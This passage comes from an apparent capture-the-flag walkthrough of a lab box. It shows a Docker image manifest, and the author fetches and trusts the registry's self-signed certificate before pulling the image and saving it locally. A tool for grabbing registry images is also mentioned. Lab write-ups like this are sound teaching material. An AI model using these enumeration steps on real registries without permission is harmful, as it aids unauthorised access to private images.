"v1Compatibility": "{\"id\":\"690545aba874c1cbffa3b6cfa0b6708cffb39c97d4b823b4cef4abd0db23cce0\",\"parent\":\"a133674c237f389cb7d5e0c12177d5a7f3dcc3f068f6e92561f5898835c827d6\",\"created\":\"2023-07-04T10:56:54.346382505Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY file:c7945822095fe4c2530de4cf6bf7c729cbe6af014740a937187ab5d2e35c30f6 in /usr/local/tomcat/webapps/hosting.war \"]}}"
},
{
"v1Compatibility": "{\"id\":\"a133674c237f389cb7d5e0c12177d5a7f3dcc3f068f6e92561f5898835c827d6\",\"parent\":\"57f5a3c239ecc33903be4eabc571b72d8d934124b84dc6bdffb476845a9af610\",\"created\":\"2023-07-04T10:56:53.888849151Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY file:9fd68c3bdf49b0400fb5ecb77c7ac57ae96f83db385b6231feb7649f7daa5c23 in /usr/local/tomcat/conf/context.xml \"]}}"
},
{
"v1Compatibility": "{\"id\":\"57f5a3c239ecc33903be4eabc571b72d8d934124b84dc6bdffb476845a9af610\",\"parent\":\"b01f09ef77c3df66690a924577eabb8ed7043baeaa37a1b608370d0489e4fdee\",\"created\":\"2023-07-04T10:56:53.629058758Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /usr/local/tomcat/webapps/ROOT\"]}}"
},
{
"v1Compatibility": "{\"id\":\"b01f09ef77c3df66690a924577eabb8ed7043baeaa37a1b608370d0489e4fdee\",\"parent\":\"80e769c3cd6d9be2bcfea77a058c23d7ea112afaddce9e12c8eebf6d759923fe\",\"created\":\"2018-01-10T09:34:07.981925046Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"catalina.sh\\\" \\\"run\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"80e769c3cd6d9be2bcfea77a058c23d7ea112afaddce9e12c8eebf6d759923fe\",\"parent\":\"f5f0aebde7367c572f72c6d19cbea5b9b039b281b5e140bcd1a9b30ebc4883ce\",\"created\":\"2018-01-10T09:34:07.723478629Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) EXPOSE 8080/tcp\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"f5f0aebde7367c572f72c6d19cbea5b9b039b281b5e140bcd1a9b30ebc4883ce\",\"parent\":\"7aa3546803b6195a9839f57454a9d61a490e5e5f921b65b7ce9883615a7fef76\",\"created\":\"2018-01-10T09:34:07.47548453Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -e \\t\\u0026\\u0026 nativeLines=\\\"$(catalina.sh configtest 2\\u003e\\u00261)\\\" \\t\\u0026\\u0026 nativeLines=\\\"$(echo \\\"$nativeLines\\\" | grep 'Apache Tomcat Native')\\\" \\t\\u0026\\u0026 nativeLines=\\\"$(echo \\\"$nativeLines\\\" | sort -u)\\\" \\t\\u0026\\u0026 if ! echo \\\"$nativeLines\\\" | grep 'INFO: Loaded APR based Apache Tomcat Native library' \\u003e\\u00262; then \\t\\techo \\u003e\\u00262 \\\"$nativeLines\\\"; \\t\\texit 1; \\tfi\"]}}"
},
{
"v1Compatibility": "{\"id\":\"7aa3546803b6195a9839f57454a9d61a490e5e5f921b65b7ce9883615a7fef76\",\"parent\":\"c23e626ece757750f0686befb692e52700626071dcd62c9b7424740c3683a842\",\"created\":\"2018-01-10T09:33:57.030831358Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -eux; \\t\\tapk add --no-cache --virtual .fetch-deps \\t\\tca-certificates \\t\\topenssl \\t; \\t\\tsuccess=; \\tfor url in $TOMCAT_TGZ_URLS; do \\t\\tif wget -O tomcat.tar.gz \\\"$url\\\"; then \\t\\t\\tsuccess=1; \\t\\t\\tbreak; \\t\\tfi; \\tdone; \\t[ -n \\\"$success\\\" ]; \\t\\techo \\\"$TOMCAT_SHA1 *tomcat.tar.gz\\\" | sha1sum -c -; \\t\\tsuccess=; \\tfor url in $TOMCAT_ASC_URLS; do \\t\\tif wget -O tomcat.tar.gz.asc \\\"$url\\\"; then \\t\\t\\tsuccess=1; \\t\\t\\tbreak; \\t\\tfi; \\tdone; \\t[ -n \\\"$success\\\" ]; \\t\\tgpg --batch --verify tomcat.tar.gz.asc tomcat.tar.gz; \\ttar -xvf tomcat.tar.gz --strip-components=1; \\trm bin/*.bat; \\trm tomcat.tar.gz*; \\t\\tnativeBuildDir=\\\"$(mktemp -d)\\\"; \\ttar -xvf bin/tomcat-native.tar.gz -C \\\"$nativeBuildDir\\\" --strip-components=1; \\tapk add --no-cache --virtual .native-build-deps \\t\\tapr-dev \\t\\tcoreutils \\t\\tdpkg-dev dpkg \\t\\tgcc \\t\\tlibc-dev \\t\\tmake \\t\\t\\\"openjdk${JAVA_VERSION%%[-~bu]*}\\\"=\\\"$JAVA_ALPINE_VERSION\\\" \\t\\topenssl-dev \\t; \\t( \\t\\texport CATALINA_HOME=\\\"$PWD\\\"; \\t\\tcd \\\"$nativeBuildDir/native\\\"; \\t\\tgnuArch=\\\"$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)\\\"; \\t\\t./configure \\t\\t\\t--build=\\\"$gnuArch\\\" \\t\\t\\t--libdir=\\\"$TOMCAT_NATIVE_LIBDIR\\\" \\t\\t\\t--prefix=\\\"$CATALINA_HOME\\\" \\t\\t\\t--with-apr=\\\"$(which apr-1-config)\\\" \\t\\t\\t--with-java-home=\\\"$(docker-java-home)\\\" \\t\\t\\t--with-ssl=yes; \\t\\tmake -j \\\"$(nproc)\\\"; \\t\\tmake install; \\t); \\trunDeps=\\\"$( \\t\\tscanelf --needed --nobanner --format '%n#p' --recursive \\\"$TOMCAT_NATIVE_LIBDIR\\\" \\t\\t\\t| tr ',' '\\\\n' \\t\\t\\t| sort -u \\t\\t\\t| awk 'system(\\\"[ -e /usr/local/lib/\\\" $1 \\\" ]\\\") == 0 { next } { print \\\"so:\\\" $1 }' \\t)\\\"; \\tapk add --virtual .tomcat-native-rundeps $runDeps; \\tapk del .fetch-deps .native-build-deps; \\trm -rf \\\"$nativeBuildDir\\\"; \\trm bin/tomcat-native.tar.gz; \\t\\tapk add --no-cache bash; \\tfind ./bin/ -name '*.sh' -exec sed -ri 's|^#!/bin/sh$|#!/usr/bin/env bash|' '{}' +\"]}}"
},
{
"v1Compatibility": "{\"id\":\"c23e626ece757750f0686befb692e52700626071dcd62c9b7424740c3683a842\",\"parent\":\"ba737ee0cd9073e2003dbc41ebaa4ac347a9da8713ee3cdd18c9099c71d715d7\",\"created\":\"2018-01-10T09:33:33.620084689Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ba737ee0cd9073e2003dbc41ebaa4ac347a9da8713ee3cdd18c9099c71d715d7\",\"parent\":\"67f844d01db77d9e5e9bdc5c154a8d40bdfe8ec30f2c0aa6c199448aab75f94e\",\"created\":\"2018-01-10T09:33:33.366948345Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"67f844d01db77d9e5e9bdc5c154a8d40bdfe8ec30f2c0aa6c199448aab75f94e\",\"parent\":\"61e9c45c309801f541720bb694574780aaf3f9c9ba939afd3a2248f921257e2b\",\"created\":\"2018-01-10T09:33:33.130789837Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"61e9c45c309801f541720bb694574780aaf3f9c9ba939afd3a2248f921257e2b\",\"parent\":\"7aa678f161898c0b2fb24800833ec8a88e29662a4aeb73d9fd09f0f3e2880638\",\"created\":\"2018-01-10T09:33:32.902199138Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_VERSION=9.0.2\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7aa678f161898c0b2fb24800833ec8a88e29662a4aeb73d9fd09f0f3e2880638\",\"parent\":\"d436c875c4061e0058d744bb26561bc738cba69b135416d441401faeb47b558c\",\"created\":\"2018-01-10T09:33:32.656603152Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_MAJOR=9\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"d436c875c4061e0058d744bb26561bc738cba69b135416d441401faeb47b558c\",\"parent\":\"15ee0d244e69dcb1e0ff2817e31071a18a7352ae4e5bb1765536a831bf69ecfc\",\"created\":\"2018-01-10T09:33:29.658955433Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -ex; \\tfor key in $GPG_KEYS; do \\t\\tgpg --keyserver ha.pool.sks-keyservers.net --recv-keys \\\"$key\\\"; \\tdone\"]}}"
},
{
"v1Compatibility": "{\"id\":\"15ee0d244e69dcb1e0ff2817e31071a18a7352ae4e5bb1765536a831bf69ecfc\",\"parent\":\"ff0264281c2fadd4108ccac96ddce82587bc26666b918f31bcb43b7ef73c65e8\",\"created\":\"2018-01-10T09:33:20.722817917Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ff0264281c2fadd4108ccac96ddce82587bc26666b918f31bcb43b7ef73c65e8\",\"parent\":\"4d9c918fda475437138013a0cf2e0c9086e7c1ed8190c1a0cef8d2b882937428\",\"created\":\"2018-01-10T09:29:11.265649726Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c apk add --no-cache gnupg\"]}}"
},
{
"v1Compatibility": "{\"id\":\"4d9c918fda475437138013a0cf2e0c9086e7c1ed8190c1a0cef8d2b882937428\",\"parent\":\"7577bdb4d1f873242bef6582d26031cdea0a64cccf8f8608a8c07cb3cc74611e\",\"created\":\"2018-01-10T09:29:07.609109611Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7577bdb4d1f873242bef6582d26031cdea0a64cccf8f8608a8c07cb3cc74611e\",\"parent\":\"839af1242b7dcef37994affedfee3e2c52246e521ac101e703737fc0164cdf5c\",\"created\":\"2018-01-10T09:29:07.376174727Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"839af1242b7dcef37994affedfee3e2c52246e521ac101e703737fc0164cdf5c\",\"parent\":\"ea6f6f5cf5c076bca613117419ab5c2d591798dc146fa25b1ab5f77dadf35a0c\",\"created\":\"2018-01-10T09:29:07.155029096Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) WORKDIR /usr/local/tomcat\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"ea6f6f5cf5c076bca613117419ab5c2d591798dc146fa25b1ab5f77dadf35a0c\",\"parent\":\"c55835e0e7564582d31203616f363dfb303cab260c1a6dec9a2a0329a8e27b81\",\"created\":\"2018-01-10T09:29:06.890891119Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p \\\"$CATALINA_HOME\\\"\"]}}"
},
{
"v1Compatibility": "{\"id\":\"c55835e0e7564582d31203616f363dfb303cab260c1a6dec9a2a0329a8e27b81\",\"parent\":\"32c57341ccdca27052b71277715b86f2c0ad436ac493bb79467a8df664379ba9\",\"created\":\"2018-01-10T09:29:06.087097667Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"32c57341ccdca27052b71277715b86f2c0ad436ac493bb79467a8df664379ba9\",\"parent\":\"c54559a23f245bd25ad627150eaadb1e99a60811ad2955e6a747f2a59b09b22b\",\"created\":\"2018-01-10T09:29:05.864118034Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV CATALINA_HOME=/usr/local/tomcat\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"c54559a23f245bd25ad627150eaadb1e99a60811ad2955e6a747f2a59b09b22b\",\"parent\":\"86a2c94b64bc779ec79acaa9f0ab00dff4a664d23f7546330a3165f1137cd596\",\"created\":\"2018-01-10T04:52:04.664605562Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -x \\t\\u0026\\u0026 apk add --no-cache \\t\\topenjdk8-jre=\\\"$JAVA_ALPINE_VERSION\\\" \\t\\u0026\\u0026 [ \\\"$JAVA_HOME\\\" = \\\"$(docker-java-home)\\\" ]\"]}}"
},
{
"v1Compatibility": "{\"id\":\"86a2c94b64bc779ec79acaa9f0ab00dff4a664d23f7546330a3165f1137cd596\",\"parent\":\"8ad7d8482d05498820d3256b0ba7eeaf21b8e7ab63044a4bce65116a5dac6a49\",\"created\":\"2018-01-10T04:51:57.540527702Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_ALPINE_VERSION=8.151.12-r0\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"8ad7d8482d05498820d3256b0ba7eeaf21b8e7ab63044a4bce65116a5dac6a49\",\"parent\":\"55332c2663c5991fc04851d7980056a37cf2d703e90ef658fd8adccd947f5ca1\",\"created\":\"2018-01-10T04:51:57.314525921Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_VERSION=8u151\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"55332c2663c5991fc04851d7980056a37cf2d703e90ef658fd8adccd947f5ca1\",\"parent\":\"3f24ff911184223f9c7e0b260cce136bc9cededdbdce79112e2a84e4c34bb568\",\"created\":\"2018-01-10T04:51:57.072315887Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"3f24ff911184223f9c7e0b260cce136bc9cededdbdce79112e2a84e4c34bb568\",\"parent\":\"0ed181ef14afa5947383aaa2644e5ece84fb1a70f3156708709f2d04b6a6ec9e\",\"created\":\"2018-01-10T04:51:56.850972184Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"0ed181ef14afa5947383aaa2644e5ece84fb1a70f3156708709f2d04b6a6ec9e\",\"parent\":\"5a545e9783766d38b2d99784c9d9bf5ed547bf48e1a293059b4cc7f27dd34b31\",\"created\":\"2018-01-10T04:48:25.431215554Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c { \\t\\techo '#!/bin/sh'; \\t\\techo 'set -e'; \\t\\techo; \\t\\techo 'dirname \\\"$(dirname \\\"$(readlink -f \\\"$(which javac || which java)\\\")\\\")\\\"'; \\t} \\u003e /usr/local/bin/docker-java-home \\t\\u0026\\u0026 chmod +x /usr/local/bin/docker-java-home\"]}}"
},
{
"v1Compatibility": "{\"id\":\"5a545e9783766d38b2d99784c9d9bf5ed547bf48e1a293059b4cc7f27dd34b31\",\"parent\":\"2dea27bce7d674e8140e0378fe5a51157011109d9da593bab1ecf86c93595292\",\"created\":\"2018-01-10T04:48:24.510692074Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ENV LANG=C.UTF-8\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"2dea27bce7d674e8140e0378fe5a51157011109d9da593bab1ecf86c93595292\",\"parent\":\"28a0c8bbcab32237452c3dadfb8302a6fab4f6064be2d858add06a7be8c32924\",\"created\":\"2018-01-09T21:10:58.579708634Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"28a0c8bbcab32237452c3dadfb8302a6fab4f6064be2d858add06a7be8c32924\",\"created\":\"2018-01-09T21:10:58.365737589Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:093f0723fa46f6cdbd6f7bd146448bb70ecce54254c35701feeceb956414622f in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "DBHZ:D6NK:J5GS:GEVJ:BWFA:4NJI:YQBD:KXGX:473R:INFC:IXXE:L4I7",
"kty": "EC",
"x": "QAwE4s7YC2ERVKhnsAKWw-_-eZ02Gq_hFZg-HnS4CKI",
"y": "TJbTTepB1svg01bhwejAvUx4udrM8t0TJLbjyoAP4PY"
},
"alg": "ES256"
},
"signature": "P35ij5ZzA5u0HV4T9h4yRluf0Sj_E2-E5GbsX1UNjA9ZzYPXFmw5MKLYZWm0UrhlVmfb5-0M5icrewFri1NTNA",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI2MDkxLCJmb3JtYXRUYWlsIjoiQ24wIiwidGltZSI6IjIwMjQtMDEtMjdUMTY6MTI6MDNaIn0"
}
]
}
There’s a ton here. The top has a key, fsLayers
, which is a list of blobSum
objects which are sha256 hashes. Each of these represents a commit to the image and contains some parts of the file system as a diff from the previous. They can be downloaded from /v2/[repository]/blobs/sha256:[hash]
.
Still, there’s no reason to manually do this.
If I try to fetch the image with docker
, it complains of untrusted certificates:
oxdf@hacky$ docker pull webhosting.htb:5000/hosting-app:latest
Error response from daemon: Get "https://webhosting.htb:5000/v2/": tls: failed to verify certificate: x509: certificate signed by unknown authority
I’ll fetch the certificate with openssl
:
oxdf@hacky$ echo | openssl s_client -showcerts -connect webhosting.htb:5000
CONNECTED(00000003)
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
verify return:1
---
Certificate chain
0 s:C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
i:C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = Acme Root CA
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Mar 26 21:32:06 2023 GMT; NotAfter: Mar 25 21:32:06 2024 GMT
-----BEGIN CERTIFICATE-----
MIIDZTCCAk2gAwIBAgIUCxIhdntb6QD+EHgpbvOABhwIvbEwDQYJKoZIhvcNAQEL
BQAwUzELMAkGA1UEBhMCQ04xCzAJBgNVBAgMAkdEMQswCQYDVQQHDAJTWjETMBEG
A1UECgwKQWNtZSwgSW5jLjEVMBMGA1UEAwwMQWNtZSBSb290IENBMB4XDTIzMDMy
NjIxMzIwNloXDTI0MDMyNTIxMzIwNlowVzELMAkGA1UEBhMCQ04xCzAJBgNVBAgM
AkdEMQswCQYDVQQHDAJTWjETMBEGA1UECgwKQWNtZSwgSW5jLjEZMBcGA1UEAwwQ
Ki53ZWJob3N0aW5nLmh0YjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
ALeRMWQ61f5GKstmqYMCtPBSf5l6xvAuQX4JX+8DpdNEuEOZ0gUu/EYU8nbJ0kH7
nwqplA7V5HCEVe/pPwRNedi9vb+qSzKxlESMrJq8lZOLjgx3sfczUspR+d14Ht63
DAijLGNBzgx027OQEcgd/h34SPEWt1XWSrSVtaJeFXAMqsPaBM2gco9ABI8j+3ki
SOespRQKNzLvJN+JWtxxHe9gxJfzRRcCH3R36ayg5jIWBa3Igo9IIzEu+364e0OL
Y6HoEX/+0Ly73v/mpei4wPay6kri1ay2mzYVfjF5WRbKFgzEZDXEAUpXLeLNMmrU
hOAaG32abKFAK3lMP6L99/0CAwEAAaMtMCswKQYDVR0RBCIwIIIOd2ViaG9zdGlu
Zy5odGKCDndlYmhvc3RpbmcuaHRiMA0GCSqGSIb3DQEBCwUAA4IBAQAQsJBESlH/
xfYbsOdsx/zm/XZbW4p0D/3V9KvSTOORcn8LPF4vFNqwJIckbTiYPM3LKSSc5r/Z
dlGnOEdKB1s3uR5kyDMy0PgHEHTdrLZCadJYIa1Z37Cc8E6zPP4SSobQo3jCifD9
FwOW4jfMtgnHiJ4PViP/9O9WuBmTqLyPbZT402V+vaEwtzcSNcp6l/dKAzyjdz+9
i9OPJGi1X2mvpVwqZhtWm2VwOjgpeVkg7XKmsyJ72/3BNN8S99PrkVpqGOjEn7OQ
c6Au7Eac1LeujFpXPQvzar8FszUIzojBPJAvWEVh2ChKahANEyWDqWxsLKF5oYy/
HgNmV9Z6pHxq
-----END CERTIFICATE-----
---
Server certificate
subject=C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = *.webhosting.htb
issuer=C = CN, ST = GD, L = SZ, O = "Acme, Inc.", CN = Acme Root CA
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1413 bytes and written 380 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_128_GCM_SHA256
Session-ID: 712661C884FCB118ED308AFADD1AFA809738B5A923961E3A4F02FF72DF2C34CE
Session-ID-ctx:
Resumption PSK: AE4BDF83CD578637D838D8AA0E1E3B22E376F7DDA6B717A862A5E63FB24EE2A5
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 604800 (seconds)
TLS session ticket:
0000 - df 90 66 da 1f f8 97 20-9a 7c f4 8c ee 04 a7 39 ..f.... .|.....9
0010 - 04 64 a9 f6 ae 8e 97 7a-3b 5c 36 5b bf 8b 3f e1 .d.....z;\6[..?.
0020 - 15 f4 c6 ab 9d 62 48 c6-15 9f 83 f2 3d c3 36 91 .....bH.....=.6.
0030 - e0 1d 94 13 70 bf ef 89-f3 8c fc 8e 35 a5 0c 2c ....p.......5..,
0040 - b9 8c 0d 41 1a b2 09 b4-25 6f 59 32 af 3c 64 94 ...A....%oY2.<d.
0050 - 49 11 be 02 ae f5 9e 76-b6 4b 6d ed 06 ba 4c e3 I......v.Km...L.
0060 - 22 47 ac e6 ea 13 c6 e6-8f dd 2f 53 9d 90 a5 23 "G......../S...#
0070 - fb .
Start Time: 1706349638
Timeout : 7200 (sec)
Verify return code: 21 (unable to verify the first certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
DONE
I need all the stuff between “BEGIN CERTIFICATE” and “END CERTIFICATE”:
oxdf@hacky$ sudo vim /usr/local/share/ca-certificates/registrytwo-ca.crt
oxdf@hacky$ cat /usr/local/share/ca-certificates/registrytwo-ca.crt
-----BEGIN CERTIFICATE-----
MIIDZTCCAk2gAwIBAgIUCxIhdntb6QD+EHgpbvOABhwIvbEwDQYJKoZIhvcNAQEL
BQAwUzELMAkGA1UEBhMCQ04xCzAJBgNVBAgMAkdEMQswCQYDVQQHDAJTWjETMBEG
A1UECgwKQWNtZSwgSW5jLjEVMBMGA1UEAwwMQWNtZSBSb290IENBMB4XDTIzMDMy
NjIxMzIwNloXDTI0MDMyNTIxMzIwNlowVzELMAkGA1UEBhMCQ04xCzAJBgNVBAgM
AkdEMQswCQYDVQQHDAJTWjETMBEGA1UECgwKQWNtZSwgSW5jLjEZMBcGA1UEAwwQ
Ki53ZWJob3N0aW5nLmh0YjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
ALeRMWQ61f5GKstmqYMCtPBSf5l6xvAuQX4JX+8DpdNEuEOZ0gUu/EYU8nbJ0kH7
nwqplA7V5HCEVe/pPwRNedi9vb+qSzKxlESMrJq8lZOLjgx3sfczUspR+d14Ht63
DAijLGNBzgx027OQEcgd/h34SPEWt1XWSrSVtaJeFXAMqsPaBM2gco9ABI8j+3ki
SOespRQKNzLvJN+JWtxxHe9gxJfzRRcCH3R36ayg5jIWBa3Igo9IIzEu+364e0OL
Y6HoEX/+0Ly73v/mpei4wPay6kri1ay2mzYVfjF5WRbKFgzEZDXEAUpXLeLNMmrU
hOAaG32abKFAK3lMP6L99/0CAwEAAaMtMCswKQYDVR0RBCIwIIIOd2ViaG9zdGlu
Zy5odGKCDndlYmhvc3RpbmcuaHRiMA0GCSqGSIb3DQEBCwUAA4IBAQAQsJBESlH/
xfYbsOdsx/zm/XZbW4p0D/3V9KvSTOORcn8LPF4vFNqwJIckbTiYPM3LKSSc5r/Z
dlGnOEdKB1s3uR5kyDMy0PgHEHTdrLZCadJYIa1Z37Cc8E6zPP4SSobQo3jCifD9
FwOW4jfMtgnHiJ4PViP/9O9WuBmTqLyPbZT402V+vaEwtzcSNcp6l/dKAzyjdz+9
i9OPJGi1X2mvpVwqZhtWm2VwOjgpeVkg7XKmsyJ72/3BNN8S99PrkVpqGOjEn7OQ
c6Au7Eac1LeujFpXPQvzar8FszUIzojBPJAvWEVh2ChKahANEyWDqWxsLKF5oYy/
HgNmV9Z6pHxq
-----END CERTIFICATE-----
Now I’ll run update-ca-certificates
and restart the docker service:
oxdf@hacky$ sudo update-ca-certificates
Updating certificates in /etc/ssl/certs...
0 added, 0 removed; done.
Running hooks in /etc/ca-certificates/update.d...
Adding debian:registrytwo-ca.pem
done.
Updating Mono key store
Mono Certificate Store Sync - version 6.8.0.105
Populate Mono certificate store from a concatenated list of certificates.
Copyright 2002, 2003 Motus Technologies. Copyright 2004-2008 Novell. BSD licensed.
Importing into legacy system store:
I already trust 138, your new list has 138
Import process completed.
Importing into BTLS system store:
I already trust 137, your new list has 138
Certificate added: C=ES, CN=Autoridad de Certificacion Firmaprofesional CIF A62634068
1 new root certificates were added to your trust store.
Import process completed.
Done
done.
oxdf@hacky$ sudo service docker restart
Now, when I run docker pull
, it’s smart enough to visit port 5001, get the auth it needs, and pull the image:
oxdf@hacky$ docker pull webhosting.htb:5000/hosting-app:latest
latest: Pulling from hosting-app
ff3a5c916c92: Pull complete
5de5f69f42d7: Pull complete
fa7536dd895a: Pull complete
7b43ca85cb2c: Pull complete
0da484dfb061: Pull complete
e4cc5f625cda: Pull complete
497760bf469e: Pull complete
f7b708f947c3: Pull complete
ab55eca3206e: Pull complete
9d5bcc17fed8: Pull complete
396c4a404488: Pull complete
b5ac54f57d23: Pull complete
9e700b74cc5b: Pull complete
4a19a05f49c2: Pull complete
0bf45c325a69: Pull complete
Digest: sha256:392c6c733e7dab7516f8519f669ad6dc867c4587b9c32ffecff194a77fb0af5b
Status: Downloaded newer image for webhosting.htb:5000/hosting-app:latest
webhosting.htb:5000/hosting-app:latest
I can also save a copy of the app locally:
oxdf@hacky$ docker save webhosting.htb:5000/hosting-app:latest > hosting-app.tar
oxdf@hacky$ file hosting-app.tar
hosting-app.tar: POSIX tar archive
It’s not important for solving the box, but I was curious how docker
got auth without my telling it, which I’ll explore in this video:
There are tools out there designed to pull Docker images from registries. DockerRegistryGrabber is a nice one. It’s worth noting at the release of RegistryTwo it did not support using auth tokens, but it seems the box may have influenced adding that feature:
It doesn’t seem to be smart like docker
to get the auth token on it’s own, but I can pass it a token and have it do things. With the catalog token, it will list:
